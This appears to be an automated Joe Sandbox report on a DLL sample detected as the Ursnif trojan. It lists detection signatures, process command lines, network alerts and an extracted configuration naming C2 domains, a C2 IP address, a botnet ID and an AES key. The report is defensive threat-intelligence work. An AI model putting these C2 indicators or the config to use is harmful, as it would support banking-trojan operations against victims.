Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pzG0rkIchr.exe

Overview

General Information

Sample Name:pzG0rkIchr.exe (renamed file extension from exe to dll)
Analysis ID:752975
MD5:d6ef4778f7dc9c31a0a2a989ef42d2fd
SHA1:5dad8394ef37d5a006674589754f7a3187d303b1
SHA256:54de1f2c26a63a8f6b7f8d5de99f8ebd4093959ab07f027db1985d0652258736
Tags:exeLDR4
Infos:

Detection

Ursnif
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Ursnif
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Performs DNS queries to domains with low reputation
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Tries to load missing DLLs
Checks if the current process is being debugged
Registers a DLL
Launches processes in debugging mode, may be used to hinder debugging
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 492 cmdline: loaddll64.exe "C:\Users\user\Desktop\pzG0rkIchr.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)
    • conhost.exe (PID: 5284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5156 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 1228 cmdline: rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 5172 cmdline: regsvr32.exe /s C:\Users\user\Desktop\pzG0rkIchr.dll MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 400 cmdline: rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 2100 cmdline: rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,ItsnPq5v MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 5904 cmdline: C:\Windows\system32\WerFault.exe -u -p 2100 -s 304 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
      • WerFault.exe (PID: 5968 cmdline: C:\Windows\system32\WerFault.exe -u -p 2100 -s 304 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • rundll32.exe (PID: 1308 cmdline: rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,QlqYo259k MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 5188 cmdline: C:\Windows\system32\WerFault.exe -u -p 1308 -s 304 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
      • WerFault.exe (PID: 3260 cmdline: C:\Windows\system32\WerFault.exe -u -p 1308 -s 304 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • cleanup
{"c2_domain": ["https://gigimas.xyz", "https://reaso.xyz"], "botnet": "202206061", "aes key": "eq2opFFpGzpd2p9t", "sleep time": "20", "request time": "30", "host keep time": "120", "host shift time": "120"}
SourceRuleDescriptionAuthorStrings
Process Memory Space: loaddll64.exe PID: 492JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
    Process Memory Space: regsvr32.exe PID: 5172JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
      Process Memory Space: rundll32.exe PID: 1228JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
        Process Memory Space: rundll32.exe PID: 400JoeSecurity_Ursnifv4Yara detected UrsnifJoe Security
          No Sigma rule has matched
          Timestamp:192.168.2.48.8.8.864906532039645 11/24/22-05:22:35.810533
          SID:2039645
          Source Port:64906
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.861007532039645 11/24/22-05:20:02.978332
          SID:2039645
          Source Port:61007
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.861124532039645 11/24/22-05:21:04.451832
          SID:2039645
          Source Port:61124
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.859444532039645 11/24/22-05:21:34.871041
          SID:2039645
          Source Port:59444
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.855570532039645 11/24/22-05:22:05.359167
          SID:2039645
          Source Port:55570
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.860686532039645 11/24/22-05:20:33.386749
          SID:2039645
          Source Port:60686
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.859446532039645 11/24/22-05:23:06.390786
          SID:2039645
          Source Port:59446
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: pzG0rkIchr.dllReversingLabs: Detection: 73%
          Source: https://reaso.xyzAvira URL Cloud: Label: malware
          Source: 3.3.regsvr32.exe.6cf200.1.raw.unpackMalware Configuration Extractor: Ursnif {"c2_domain": ["https://gigimas.xyz", "https://reaso.xyz"], "botnet": "202206061", "aes key": "eq2opFFpGzpd2p9t", "sleep time": "20", "request time": "30", "host keep time": "120", "host shift time": "120"}
          Source: pzG0rkIchr.dllStatic PE information: certificate valid
          Source: pzG0rkIchr.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: UxTheme.pdb source: WerFault.exe, 0000000B.00000003.395877568.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.396307800.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32.pdb source: WerFault.exe, 0000000B.00000003.396163566.000001716E474000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396822650.000001DFB5E14000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernelbase.pdb0 source: WerFault.exe, 0000000B.00000003.392399774.000001716D896000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390485617.000001DFB52D7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.392399063.000001DFB52D7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bcryptprimitives.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.395877568.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.396307800.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rpcrt4.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: dwmapi.pdb: source: WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: se.pdb\ source: WerFault.exe, 0000000C.00000002.404139284.000001DFB33E2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernelbase.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: shcore.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: combase.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: win32u.pdb8 source: WerFault.exe, 0000000B.00000003.396163566.000001716E474000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396822650.000001DFB5E14000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: se.pdb( source: WerFault.exe, 0000000B.00000002.404499737.000001716B9D2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: oleaut32.pdb6 source: WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: UxTheme.pdb" source: WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msctf.pdb source: WerFault.exe, 0000000B.00000003.395877568.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.396307800.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32full.pdb8 source: WerFault.exe, 0000000B.00000003.396163566.000001716E474000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396822650.000001DFB5E14000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32.pdb8 source: WerFault.exe, 0000000B.00000003.396163566.000001716E474000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396822650.000001DFB5E14000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: user32.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.396118866.000001716E470000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396815765.000001DFB5E10000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: .pdbU source: WerFault.exe, 0000000B.00000002.404499737.000001716B9D2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rpcrt4.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: imagehlp.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ntdll.pdb source: WerFault.exe, 0000000B.00000003.390149544.000001716D88A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.393542297.000001716D88A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390425076.000001DFB52CA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.393721593.000001DFB52CA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernel32.pdb source: WerFault.exe, 0000000B.00000003.390201513.000001716D890000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.392963034.000001716D890000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390462142.000001DFB52D1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.393053418.000001DFB52D1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000B.00000003.390045053.000001716D884000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.389884691.000001716D918000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390315024.000001DFB52C4000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390223237.000001DFB5359000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: se.pdb source: WerFault.exe, 0000000B.00000002.404499737.000001716B9D2000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000002.404139284.000001DFB33E2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcrt.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.395877568.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.396307800.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ntdll.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: win32u.pdb source: WerFault.exe, 0000000B.00000003.396163566.000001716E474000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396822650.000001DFB5E14000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32full.pdb source: WerFault.exe, 0000000B.00000003.396163566.000001716E474000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396822650.000001DFB5E14000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernel32.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: user32.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000B.00000003.395877568.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.396307800.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ntdll.pdb0 source: WerFault.exe, 0000000B.00000003.390149544.000001716D88A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.393542297.000001716D88A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390425076.000001DFB52CA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.393721593.000001DFB52CA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernelbase.pdb source: WerFault.exe, 0000000B.00000003.392399774.000001716D896000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390485617.000001DFB52D7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.392399063.000001DFB52D7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernel32.pdb0 source: WerFault.exe, 0000000B.00000003.390201513.000001716D890000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.392963034.000001716D890000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390462142.000001DFB52D1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.393053418.000001DFB52D1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: imm32.pdb source: WerFault.exe, 0000000B.00000003.396118866.000001716E470000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396815765.000001DFB5E10000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C07FB70 FindFirstFileExA,0_2_00007FF88C07FB70
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C07FB70 FindFirstFileExA,3_2_00007FF88C07FB70
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C07FB70 FindFirstFileExA,6_2_00007FF88C07FB70

          Networking

          barindex
          Source: C:\Windows\System32\rundll32.exeNetwork Connect: 185.250.148.35 443Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDomain query: gigimas.xyz
          Source: TrafficSnort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:61007 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:60686 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:61124 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:59444 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:55570 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:64906 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2039645 ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) 192.168.2.4:59446 -> 8.8.8.8:53
          Source: C:\Windows\System32\rundll32.exeDNS query: gigimas.xyz
          Source: C:\Windows\System32\rundll32.exeDNS query: gigimas.xyz
          Source: C:\Windows\System32\rundll32.exeDNS query: gigimas.xyz
          Source: C:\Windows\System32\rundll32.exeDNS query: gigimas.xyz
          Source: C:\Windows\System32\rundll32.exeDNS query: gigimas.xyz
          Source: C:\Windows\System32\rundll32.exeDNS query: gigimas.xyz
          Source: C:\Windows\System32\rundll32.exeDNS query: gigimas.xyz
          Source: Joe Sandbox ViewASN Name: FIRSTDC-ASRU FIRSTDC-ASRU
          Source: Joe Sandbox ViewIP Address: 185.250.148.35 185.250.148.35
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: pzG0rkIchr.dllString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: WerFault.exe, 0000000B.00000002.405055392.000001716D880000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000002.404603896.000001DFB52C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: WerFault.exe, 0000000B.00000002.405055392.000001716D880000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000002.404603896.000001DFB52C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: pzG0rkIchr.dllString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
          Source: pzG0rkIchr.dllString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
          Source: pzG0rkIchr.dllString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
          Source: pzG0rkIchr.dllString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
          Source: pzG0rkIchr.dllString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
          Source: pzG0rkIchr.dllString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
          Source: pzG0rkIchr.dllString found in binary or memory: http://ocsp.comodoca.com0
          Source: pzG0rkIchr.dllString found in binary or memory: http://ocsp.sectigo.com0
